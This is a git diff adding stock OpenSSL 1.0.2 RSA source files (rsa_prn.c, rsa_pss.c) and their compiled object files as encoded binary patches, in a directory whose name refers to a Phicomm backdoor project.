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
OV=v`V^Hq9U$Nx8Y<e{ek

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_prn.c
new file mode 100644
index 0000000..076f871
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_prn.c
@@ -0,0 +1,92 @@
+/* crypto/rsa/rsa_prn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/rsa.h>
+#include <openssl/evp.h>
+
+#ifndef OPENSSL_NO_FP_API
+int RSA_print_fp(FILE *fp, const RSA *x, int off)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        RSAerr(RSA_F_RSA_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = RSA_print(b, x, off);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int RSA_print(BIO *bp, const RSA *x, int off)
+{
+    EVP_PKEY *pk;
+    int ret;
+    pk = EVP_PKEY_new();
+    if (!pk || !EVP_PKEY_set1_RSA(pk, (RSA *)x))
+        return 0;
+    ret = EVP_PKEY_print_private(bp, pk, off, NULL);
+    EVP_PKEY_free(pk);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_prn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_prn.o
new file mode 100644
index 0000000000000000000000000000000000000000..a1c74397c3cb150fbd544f744297dfd236f41ffd
GIT binary patch
literal 2408
zcmbuAU2F_d6oBt`ilWB)ODd$<gh&Nr2MPKhowc)_ve8;y2~m@2JN4J@Zf5V&iXcR}
z(c;mICy7_D;(<*Nyb|vcg7_C6L>ioP=icsgy8FUO&YW|<d(J&~@0~e&#!RQ`A`v1b
zLbj30NK!&tW>)+*?zWM6q>+4|-~7wS8tjG9-N7cZ*7=W7i_w)0?=Z%?44!qNT&ma0
zAJ$v!vBe(oi3?@=Nq?GT?=AK@&EERK><deZ#LM7V=O0FUi~~l`172fq2m3u)=tp+9
z$a(BrsL^cdW&P>hSy1;Lg~$DRc$oTY9`Hef(rNZhe|GOEZjAYPY4*lqUtk|{2L^k{
z-Tg`Sk{34)J|OMex3|Vxvc07oEycEK8@2d4eRGKq_0t>TT71)LAH&L6GzvNcw0&2W
z)DcofrhuX>_6>=g%#g@%G_tI5R>L(o@U_5~i@AQZDK$D?XR1wON>YuD)+g0?-A*-T
zs7(nqnot`yK}cG}pAqp_Fn(My)z}!sw~Wp(Ajwu+V1b0p6DiXS-g!Ow_Gj7z0Hx|1
zfn5HosaXm?g{cfj3JJVKfoX-{rA-%wG)#v;6n?r>r{=<NVPK#941p~H#rp`$8UWS!
zmKuCV4er$7dEmGoxetCvz)sbOzgUA`t-){9;J0dU;uRgc;N`SFlG$T`cO*xN-Jb4D
z7-_pRmD*!=+ucSYZQ8`#+hup{H22v#_e5n-bg6DbYK8DMaHZo8bt`zlbKOb}d!RrP
z9i4X39yl`Sa+fcg$=HPwwO!B4dz|)BZ;(4YpDcynfr8%--tEL6Up62FLEZ=|c?uy2
z@_C?=XApuQS3xB|i4X)iz6X+@LkNO=0jT6R5rQCJ2rBtqgdoTlflB@aAqeu>pprjF
z2!b4Yf#fmpQJ`ON<pX$h2}kmNIiVFthN#m^v?BF<dsup&JLqWC9i~L<cc??O-eQqx
zefgmw7cO1P<*BPdZ(3KRPTw&xK9nnI1utK4Jvu@(zJhz$9`KwYS62Kl8-r}@G2sr-
z1`OquZzi7@8<b@*z%y$LLh!F61o`S4G6yW?%FfXw_$tA}9cx9nkcbas?9aI7zvk<r
zeq5|CjjWITC@8YNw5>2H{b1a#YOqQy_Al(R_#OqNOXSCb5PW%l68D0Gq2c_3$UiFs
zg$?KT0Izm`m++4gM4k)YALhz@d4JVvW8PO$|EI9nEAV>@=OYW>9U$^fz}q+oh*)lt
TU@xeae@E<pa5B<&!ufvzx9UIp

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pss.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pss.c
new file mode 100644
index 0000000..41bc084
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pss.c
@@ -0,0 +1,290 @@
+/* rsa_pss.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <openssl/sha.h>
+
+static const unsigned char zeroes[] = { 0, 0, 0, 0, 0, 0, 0, 0 };
+
+#if defined(_MSC_VER) && defined(_ARM_)
+# pragma optimize("g", off)
+#endif
+
+int RSA_verify_PKCS1_PSS(RSA *rsa, const unsigned char *mHash,
+                         const EVP_MD *Hash, const unsigned char *EM,
+                         int sLen)
+{
+    return RSA_verify_PKCS1_PSS_mgf1(rsa, mHash, Hash, NULL, EM, sLen);
+}
+
+int RSA_verify_PKCS1_PSS_mgf1(RSA *rsa, const unsigned char *mHash,
+                              const EVP_MD *Hash, const EVP_MD *mgf1Hash,
+                              const unsigned char *EM, int sLen)
+{
+    int i;
+    int ret = 0;
+    int hLen, maskedDBLen, MSBits, emLen;
+    const unsigned char *H;
+    unsigned char *DB = NULL;
+    EVP_MD_CTX ctx;
+    unsigned char H_[EVP_MAX_MD_SIZE];
+    EVP_MD_CTX_init(&ctx);
+
+    if (mgf1Hash == NULL)
+        mgf1Hash = Hash;
+
+    hLen = EVP_MD_size(Hash);
+    if (hLen < 0)
+        goto err;
+    /*-
+     * Negative sLen has special meanings:
+     *      -1      sLen == hLen
+     *      -2      salt length is autorecovered from signature
+     *      -N      reserved
+     */
+    if (sLen == -1)
+        sLen = hLen;
+    else if (sLen == -2)
+        sLen = -2;
+    else if (sLen < -2) {
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, RSA_R_SLEN_CHECK_FAILED);
+        goto err;
+    }
+
+    MSBits = (BN_num_bits(rsa->n) - 1) & 0x7;
+    emLen = RSA_size(rsa);
+    if (EM[0] & (0xFF << MSBits)) {
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, RSA_R_FIRST_OCTET_INVALID);
+        goto err;
+    }
+    if (MSBits == 0) {
+        EM++;
+        emLen--;
+    }
+    if (emLen < (hLen + sLen + 2)) { /* sLen can be small negative */
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, RSA_R_DATA_TOO_LARGE);
+        goto err;
+    }
+    if (EM[emLen - 1] != 0xbc) {
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, RSA_R_LAST_OCTET_INVALID);
+        goto err;
+    }
+    maskedDBLen = emLen - hLen - 1;
+    H = EM + maskedDBLen;
+    DB = OPENSSL_malloc(maskedDBLen);
+    if (!DB) {
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (PKCS1_MGF1(DB, maskedDBLen, H, hLen, mgf1Hash) < 0)
+        goto err;
+    for (i = 0; i < maskedDBLen; i++)
+        DB[i] ^= EM[i];
+    if (MSBits)
+        DB[0] &= 0xFF >> (8 - MSBits);
+    for (i = 0; DB[i] == 0 && i < (maskedDBLen - 1); i++) ;
+    if (DB[i++] != 0x1) {
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, RSA_R_SLEN_RECOVERY_FAILED);
+        goto err;
+    }
+    if (sLen >= 0 && (maskedDBLen - i) != sLen) {
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, RSA_R_SLEN_CHECK_FAILED);
+        goto err;
+    }
+    if (!EVP_DigestInit_ex(&ctx, Hash, NULL)
+        || !EVP_DigestUpdate(&ctx, zeroes, sizeof zeroes)
+        || !EVP_DigestUpdate(&ctx, mHash, hLen))
+        goto err;
+    if (maskedDBLen - i) {
+        if (!EVP_DigestUpdate(&ctx, DB + i, maskedDBLen - i))
+            goto err;
+    }
+    if (!EVP_DigestFinal_ex(&ctx, H_, NULL))
+        goto err;
+    if (memcmp(H_, H, hLen)) {
+        RSAerr(RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1, RSA_R_BAD_SIGNATURE);
+        ret = 0;
+    } else
+        ret = 1;
+
+ err:
+    if (DB)
+        OPENSSL_free(DB);
+    EVP_MD_CTX_cleanup(&ctx);
+
+    return ret;
+
+}
+
+int RSA_padding_add_PKCS1_PSS(RSA *rsa, unsigned char *EM,
+                              const unsigned char *mHash,
+                              const EVP_MD *Hash, int sLen)
+{
+    return RSA_padding_add_PKCS1_PSS_mgf1(rsa, EM, mHash, Hash, NULL, sLen);
+}
+
+int RSA_padding_add_PKCS1_PSS_mgf1(RSA *rsa, unsigned char *EM,
+                                   const unsigned char *mHash,
+                                   const EVP_MD *Hash, const EVP_MD *mgf1Hash,
+                                   int sLen)
+{
+    int i;
+    int ret = 0;
+    int hLen, maskedDBLen, MSBits, emLen;
+    unsigned char *H, *salt = NULL, *p;
+    EVP_MD_CTX ctx;
+
+    if (mgf1Hash == NULL)
+        mgf1Hash = Hash;
+
+    hLen = EVP_MD_size(Hash);
+    if (hLen < 0)
+        goto err;
+    /*-
+     * Negative sLen has special meanings:
+     *      -1      sLen == hLen
+     *      -2      salt length is maximized
+     *      -N      reserved
+     */
+    if (sLen == -1)
+        sLen = hLen;
+    else if (sLen == -2)
+        sLen = -2;
+    else if (sLen < -2) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_PSS_MGF1, RSA_R_SLEN_CHECK_FAILED);
+        goto err;
+    }
+
+    MSBits = (BN_num_bits(rsa->n) - 1) & 0x7;
+    emLen = RSA_size(rsa);
+    if (MSBits == 0) {
+        *EM++ = 0;
+        emLen--;
+    }
+    if (sLen == -2) {
+        sLen = emLen - hLen - 2;
+    } else if (emLen < (hLen + sLen + 2)) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_PSS_MGF1,
+               RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE);
+        goto err;
+    }
+    if (sLen > 0) {
+        salt = OPENSSL_malloc(sLen);
+        if (!salt) {
+            RSAerr(RSA_F_RSA_PADDING_ADD_PKCS1_PSS_MGF1,
+                   ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (RAND_bytes(salt, sLen) <= 0)
+            goto err;
+    }
+    maskedDBLen = emLen - hLen - 1;
+    H = EM + maskedDBLen;
+    EVP_MD_CTX_init(&ctx);
+    if (!EVP_DigestInit_ex(&ctx, Hash, NULL)
+        || !EVP_DigestUpdate(&ctx, zeroes, sizeof zeroes)
+        || !EVP_DigestUpdate(&ctx, mHash, hLen))
+        goto err;
+    if (sLen && !EVP_DigestUpdate(&ctx, salt, sLen))
+        goto err;
+    if (!EVP_DigestFinal_ex(&ctx, H, NULL))
+        goto err;
+    EVP_MD_CTX_cleanup(&ctx);
+
+    /* Generate dbMask in place then perform XOR on it */
+    if (PKCS1_MGF1(EM, maskedDBLen, H, hLen, mgf1Hash))
+        goto err;
+
+    p = EM;
+
+    /*
+     * Initial PS XORs with all zeroes which is a NOP so just update pointer.
+     * Note from a test above this value is guaranteed to be non-negative.
+     */
+    p += emLen - sLen - hLen - 2;
+    *p++ ^= 0x1;
+    if (sLen > 0) {
+        for (i = 0; i < sLen; i++)
+            *p++ ^= salt[i];
+    }
+    if (MSBits)
+        EM[0] &= 0xFF >> (8 - MSBits);
+
+    /* H is already in place so just set final 0xbc */
+
+    EM[emLen - 1] = 0xbc;
+
+    ret = 1;
+
+ err:
+    if (salt)
+        OPENSSL_free(salt);
+
+    return ret;
+
+}
+
+#if defined(_MSC_VER)
+# pragma optimize("",on)
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pss.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pss.o
new file mode 100644
index 0000000000000000000000000000000000000000..29491314ea0c4317892374e9dfa19c42a2bf3cda
GIT binary patch
literal 5128
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
